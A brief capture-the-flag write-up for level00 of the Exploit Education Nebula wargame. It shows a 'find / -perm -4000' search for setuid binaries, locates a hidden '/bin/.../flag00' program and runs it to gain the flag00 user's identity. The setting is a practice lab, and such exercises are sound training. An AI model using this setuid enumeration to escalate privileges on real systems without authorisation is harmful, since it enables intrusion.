Question
https://exploit.education/nebula/level-00/

Sol. - Find files having setuid from root
Run:
 $find / -perm -4000
Output:
/bin/.../flag00  <== Found!
/bin/fusermount
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
find: `/etc/chatscripts': Permission denied
find: `/etc/ppp/peers': Permission denied
find: `/etc/ssl/private': Permission denied
find: `/home/flag00': Permission denied
/home/flag01/flag01
find: `/home/flag02': Permission denied
find: `/home/flag03': Permission denied
find: `/home/flag04': Permission denied

level00@nebula:~$ ls -al /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ id
uid=999(flag00) gid=1001(level00) groups=999(flag00),1001(level00)
flag00@nebula:~$

